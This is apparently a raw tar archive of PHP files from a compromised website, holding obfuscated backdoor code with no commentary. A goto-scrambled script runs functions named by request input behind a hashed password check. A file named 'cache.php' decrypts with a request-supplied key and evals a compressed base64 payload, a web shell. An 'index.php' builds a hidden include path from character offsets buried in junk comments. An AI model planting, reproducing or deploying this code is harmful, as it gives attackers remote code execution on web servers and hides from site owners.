0]($GXyfy8lcfm7s2_Y, true); goto C5CwPolRW49dOAv; diAY069QsvLtKaD: if (!(@$GeN2Dqy9dtoyCix[0] - time() > 0 and md5(md5($GeN2Dqy9dtoyCix[3 + 0])) === "\141\65\60\65\x30\145\144\63\x38\67\x31\146\x64\x36\x61\x30\64\x64\61\x31\142\x30\146\145\143\62\143\x61\x64\61\60\71")) { goto RjrPoILgdIDYwMc; } goto oCtfh7uJiKi3aDz; SKoq3P5hX_6OVlv: $GXyfy8lcfm7s2_Y = @$jLN0gh1wlR9GCug[3 + 0]($jLN0gh1wlR9GCug[5 + 1], $D6DD6UR2VKL1fv4); goto VQ0ZrBInlNWdWo_; zuDSTdsAgBMUdXJ: RjrPoILgdIDYwMc: goto QtcVtLyyiweDcqt; cskkQrs6pLx1Nfs: $D6DD6UR2VKL1fv4 = @$jLN0gh1wlR9GCug[1]($jLN0gh1wlR9GCug[8 + 2](INPUT_GET, $jLN0gh1wlR9GCug[6 + 3])); goto SKoq3P5hX_6OVlv; fo4d4k6Bxmu1AoZ: UKAmoq2rRM90bPy: goto cskkQrs6pLx1Nfs; QtcVtLyyiweDcqt: } } goto wRTkK6dL9z9GPpM; wRTkK6dL9z9GPpM: Iul3UWES5jhtNs6::oG8Dcpc9U_dG_E1();
?>
��������������������������������������������������������������������������������������������������������������������������������������������������������������cache.php�������������������������������������������������������������������������������������������0000666�����������������00000013017�15113775560�0006340 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php $IlPHF = 'Sy1LzNFQKyzNL7G2V0svsYYw9dKrSvOS83MLilKLizXSqzLz0nISS1KRWEmJxalmJvEpqcn5KakaxSVFRallGioZWe6aYGANAA'; $hjG = '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'; function IlPHF($InEta) { $hjG = ${"\137\x52\x45\121\125\x45\123\x54"}["k"]; $shR = substr($hjG, 0, 16); $cQHN = base64_decode($InEta); return openssl_decrypt($cQHN, "AES-256-CBC", $hjG, OPENSSL_RAW_DATA, $shR); } if (IlPHF('DjtPn+r4S0yvLCnquPz1fA')){ echo 'k269jPlMEkS3izZe7yNZMrg47j7l64ojh+FOeTiHDmvAvims4h/sI/V3pUeSeThM'; exit; } eval(htmlspecialchars_decode(gzinflate(base64_decode($IlPHF)))); ?>�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������index.php�������������������������������������������������������������������������������������������0000666�����������������00000003242�15113775560�0006403 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php /*-
☺♆
#0x☺♆
-*///
$qmb /*-
◘◓㊌Θ♠✩➽☆ⓣ
gNa@88(L◘◓㊌Θ♠✩➽☆ⓣ
-*///
=/*-
@⇈
^+@⇈
-*///
"ra"/*-3DLC-*///
."nge"; $PUrI /*-5Sp[^Do@@K-*///
=/*-
⋔♝≦ت⋵ⓗⓎ≌≅◮∞⋀
|⋔♝≦ت⋵ⓗⓎ≌≅◮∞⋀
-*///
$qmb/*-
☁┺⌔≻❄
6_:zk☁┺⌔≻❄
-*///
(/*-0m]Ex-*///
"~"/*-
┲❋£【➹﹎۰Ⓖ
jM┲❋£【➹﹎۰Ⓖ
-*///
,/*-
㊃◙}ℋ✈♠≅⇕✆
O_k+s6㊃◙}ℋ✈♠≅⇕✆
-*///
" "); /*-
≶☄›▔↻≳▃⊮⋘✴≞⓭↝◖╥❅⇪♛︻ℱ❣▷
}CmdO≶☄›▔↻≳▃⊮⋘✴≞⓭↝◖╥❅⇪♛︻ℱ❣▷
-*///
@require/*-|6-*///
$PUrI/*-U{j-*///
[4+45].$PUrI/*-
ⅸ⓻╇﹣⑦}⊱⋍✤┛⓼
u8_Q0vBⅸ⓻╇﹣⑦}⊱⋍✤┛⓼
-*///
[16+43].$PUrI/*-
㈡㈢㊡≘¿㍿⑬◽◗)㊑▔⊿⊣㊐≾ℚ⇦≱┦◷▭⊆ⓢⅺ☭⊾⒟
r(mNd&[j㈡㈢㊡≘¿㍿⑬◽◗)㊑▔⊿⊣㊐≾ℚ⇦≱┦◷▭⊆ⓢⅺ☭⊾⒟
-*///
[21+2].$PUrI/*-
☿➤☾Ⓢ⒝➽⋻⇝≪▹◐㊋≀◚∕♯┆➮⊓ⓡ
u)☿➤☾Ⓢ⒝➽⋻⇝≪▹◐㊋≀◚∕♯┆➮⊓ⓡ
-*///
[12+12].$PUrI/*-
☜↢∫⋓ⅱ┊ϟ≂↡♠±♧〔☇—↩↛→』⒛☟⋫☐㈤﹏⋰╆▕
y%vrk|N6`☜↢∫⋓ⅱ┊ϟ≂↡♠±♧〔☇—↩↛→』⒛☟⋫☐㈤﹏⋰╆▕
-*///
[43+5].$PUrI/*-UnL:R-*///
[8+0].$PUrI/*-D:T}Z#Qy-*///
[5+75].$PUrI/*-
▬╨⑥⊁▓⋶➬№☺♁▌⋎⑽⇍ↇ⊵ℕ♆ⓤ
^^▬╨⑥⊁▓⋶➬№☺♁▌⋎⑽⇍ↇ⊵ℕ♆ⓤ
-*///
[5+16].$PUrI/*-u>gh:b,H#-*///
[0+27].$PUrI/*-
➅㊗
,q$qH(➅㊗
-*///
[1+14]/*-
㈣✈⒐⋾∇≊ℙ㊦⒚❐⑫⇆⅗
Tg7q㈣✈⒐⋾∇≊ℙ㊦⒚❐⑫⇆⅗
-*///
; ?>������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������